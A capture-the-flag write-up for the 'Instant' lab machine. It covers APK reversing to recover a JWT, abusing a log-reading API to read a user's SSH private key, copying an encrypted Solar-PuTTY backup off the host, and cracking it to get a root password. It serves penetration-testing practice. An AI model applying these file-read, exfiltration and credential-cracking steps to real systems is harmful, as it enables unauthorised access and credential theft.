Instant
Synopsis
Instant is a medium linux machine created by tahaafarooq. The instant.htb domain contains the apk file. The reversing of apk file reveals the subdomains and JWT token which is used to read the logs. Abusing the read logs functionality to read the id_rsa of the shirohige user. The /opt directory contains the Solar-PuTTY password protected encrypted .dat file which contains the session and credentials. Decryption the file reveals the root password.
Linux
Medium
30
12-10-2024
01-03-2025
Enumeration
Nmap
Starting the nmap scan and found the ssh and http services running.
nmap -p- -Pn -sC -sV --min-rate=1000 10.10.11.37
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-14 09:30 EST
Warning: 10.10.11.37 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.11.37
Host is up (0.44s latency).
Not shown: 63941 closed tcp ports (conn-refused), 1592 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.6p1 Ubuntu 3ubuntu13.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 31:83:eb:9f:15:f8:40:a5:04:9c:cb:3f:f6:ec:49:76 (ECDSA)
|_ 256 6f:66:03:47:0e:8a:e0:03:97:67:5b:41:cf:e2:c7:c7 (ED25519)
80/tcp open http Apache httpd 2.4.58
Service Info: Host: instant.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 216.45 secondsAdd instant.htb in /etc/hosts file.
Web - instant.htb
Instant is a crypto wallet. The website shows instant wallet features and we can download the instant.apk.
File - instant.apk
Downloaded the instant.apk and reversed it using the jadx-gui. It contains the JWT token and mywalletv1.instant.htb subdomain in AdminActivities class.
Text searching the .htb I got another subdomain swagger-ui.instant.htb.
Add both the mywalletv1 and swagger subdomain in /etc/hosts file.
Web - swagger-ui.instant.htb
Swagger (software) is a suite of tools for API developers, the project is open-source and licensed under the Apache License 2.0.
Clicking the Authorize button gives us form to input the Authorization token, adding the previously gained JWT gives us the authorization.
Foothold
Shell - shirohige [ read logs ]
The Logs section cantains the API to read and view the logs. It also shows the path to the log which is present in /home/shirohige/logs
Clicking the Try it out button and adding the default path to id_rsa file gives us the id_rsa.
Copy the id_rsa into the file and clear up the extra spaces and words.
chmod 600 id_rsassh -i id_rsa shirohige@10.10.11.37
Welcome to Ubuntu 24.04.1 LTS (GNU/Linux 6.8.0-45-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/pro
This system has been minimized by removing packages and content that are
not required on a system that users do not log into.
To restore this content, you can run the 'unminimize' command.
Last login: Mon Feb 17 05:42:25 2025 from 10.10.16.25
shirohige@instant:~$Privilege Escalation
Pillaging - shirohige
Checking sudo privilege requires command, the instant.db is found which has some of the hashes but it is uncrackable using hashcat and rockyou.txt wordlist. The /opt/backups directory contains the SolarPutty directory.
shirohige@instant:~$ cd /opt/backups
shirohige@instant:/opt/backups$ ls
Solar-PuTTYSolar-PuTTY is a free SSH client developed by SolarWinds that allows you to connect to any server or device on your network
The Solar-PuTTY directory contains the sessions-backup.dat file. The .dat file in Solar-PuTTY is used to store sessions and credentials which is encrypted.
shirohige@instant:/opt/backups/Solar-PuTTY$ ls
sessions-backup.datShell - root [ .dat file decrypt ]
The VoidSec has created the github repository to decrypt the Solar-PuTTY .dat files using wordlists and saving it into the file.
The repository contains the .exe file which will execute in Windows machine properly but I am using Linux machine and wine32 is giving some error. The ItsWatchMakerr has created the github repository which contains the python script to decrypt the Solar-PuTTY .dat files and I will be using this script.
Transfering sessions-backup.dat file to local machine
Open the python http server in remote machine and download it using the wget in local machine.
shirohige@instant:/opt/backups/Solar-PuTTY$ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.16.9 - - [18/Feb/2025 05:18:08] "GET /sessions-backup.dat HTTP/1.1" 200 -wget http://10.10.11.37:8000/sessions-backup.dat
--2025-02-18 00:35:14-- http://10.10.11.37:8000/sessions-backup.dat
Connecting to 10.10.11.37:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1100 (1.1K) [application/octet-stream]
Saving to: ‘sessions-backup.dat’
sessions-backup.dat 100%[========================================================================================>] 1.07K 1.25KB/s in 0.9s
2025-02-18 00:35:16 (1.25 KB/s) - ‘sessions-backup.dat’ saved [1100/1100]Git clone the above repository
git clone https://github.com/ItsWatchMakerr/SolarPuttyCracker.git
Cloning into 'SolarPuttyCracker'...
remote: Enumerating objects: 18, done.
remote: Counting objects: 100% (18/18), done.
remote: Compressing objects: 100% (12/12), done.
remote: Total 18 (delta 4), reused 10 (delta 3), pack-reused 0 (from 0)
Receiving objects: 100% (18/18), 6.97 KiB | 1.74 MiB/s, done.
Resolving deltas: 100% (4/4), done.Install the required module and execute the script
Changing directory to SolarPuttyCracker and installing the required module.
cd SolarPuttyCracker
pip3 install -r requirements.txtExecuting the script with required arguments.
python3 SolarPuttyCracker.py -w /usr/share/wordlists/rockyou.txt -o ../session_restore.txt ../sessions-backup.dat
____ __ ___ __ __ _____ __
/ __/___ / /___ _ ____ / _ \ __ __ / /_ / /_ __ __ / ___/____ ___ _ ____ / /__ ___ ____
_\ \ / _ \ / // _ `// __/ / ___// // // __// __// // / / /__ / __// _ `// __// '_// -_)/ __/
/___/ \___//_/ \_,_//_/ /_/ \_,_/ \__/ \__/ \_, / \___//_/ \_,_/ \__//_/\_\ \__//_/
/___/
Trying to decrypt using passwords from wordlist...
Decryption successful using password: estrella
[+] DONE Decrypted file is saved in: ../session_restore.txtThe session_restore.txt contains the root ssh password.
{
"Sessions": [
{
"Id": "066894ee-635c-4578-86d0-d36d4838115b",
"Ip": "10.10.11.37",
"Port": 22,
"ConnectionType": 1,
"SessionName": "Instant",
"Authentication": 0,
"CredentialsID": "452ed919-530e-419b-b721-da76cbe8ed04",
"AuthenticateScript": "00000000-0000-0000-0000-000000000000",
"LastTimeOpen": "0001-01-01T00:00:00",
"OpenCounter": 1,
"SerialLine": null,
"Speed": 0,
"Color": "#FF176998",
"TelnetConnectionWaitSeconds": 1,
"LoggingEnabled": false,
"RemoteDirectory": ""
}
],
"Credentials": [
{
"Id": "452ed919-530e-419b-b721-da76cbe8ed04",
"CredentialsName": "instant-root",
"Username": "root",
"Password": "12**24nzC!r0c%q12",
"PrivateKeyPath": "",
"Passphrase": "",
"PrivateKeyContent": null
}
],
"AuthScript": [],
"Groups": [],
"Tunnels": [],
"LogsFolderDestination": "C:\\ProgramData\\SolarWinds\\Logs\\Solar-PuTTY\\SessionLogs"
}We will be using su command to change the user to root through shirohige because the SSH doesn't work using the above credentials.
shirohige@instant:/opt/backups/Solar-PuTTY$ su root
Password:
root@instant:/opt/backups/Solar-PuTTY# whoami
root
root@instant:/opt/backups/Solar-PuTTY# Proof of Concept
The below video provides the PoC of Instant machine.
Last updated